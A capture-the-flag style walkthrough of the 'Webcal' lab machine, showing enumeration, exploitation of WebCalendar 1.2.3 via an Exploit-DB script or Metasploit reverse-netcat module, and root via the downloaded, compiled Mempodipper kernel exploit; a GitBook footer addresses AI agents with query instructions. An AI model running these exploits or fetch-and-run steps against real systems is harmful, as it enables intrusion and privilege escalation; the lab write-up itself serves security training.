> For the complete documentation index, see [llms.txt](https://cel1s0.gitbook.io/offsec-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cel1s0.gitbook.io/offsec-notes/walkthroughs/pg-practice/linux/get-to-work/webcal.md).

# Webcal

### Enumeration

```
80/tcp open  http    Apache httpd 2.2.20 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.20 (Ubuntu)
|_http-title: Construction Page
```

```
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.175.37
+ Target Port: 80
...
+ OSVDB-3093: GET /webcalendar/login.php: This might be interesting...
```

WebCalendar v1.2.3 (14 Aug 2010)

### Initial Access

```
$ php /usr/share/exploitdb/exploits/php/webapps/18775.php 192.168.175.37 /webcalendar/
```

OR

```
msf6 exploit(linux/http/webcalendar_settings_exec) > options

Module options (exploit/linux/http/webcalendar_settings_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,t
                                         ype:host:port][...]
   RHOSTS     192.168.175.37   yes       The target host(s), range CIDR identifier
                                         , or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connection
                                         s
   TARGETURI  /webcalendar/    yes       The URI path to webcalendar
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be speci
                                     fied)
   LPORT  80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WebCalendar 1.2.4 on Linux
```

### PrivEsc

```
www-data@ucal:/$ uname -a
Linux ucal 3.0.0-12-server #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
```

Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2) | exploits/linux/local/35161.c

```
$ wget https://www.exploit-db.com/raw/35161 -O 35161.c
```

```
www-data@ucal:/$ cd /tmp
www-data@ucal:/tmp$ wget http://192.168.49.175/35161.c
www-data@ucal:/tmp$ gcc 35161.c -o poc
www-data@ucal:/tmp$ ./poc
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://cel1s0.gitbook.io/offsec-notes/walkthroughs/pg-practice/linux/get-to-work/webcal.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.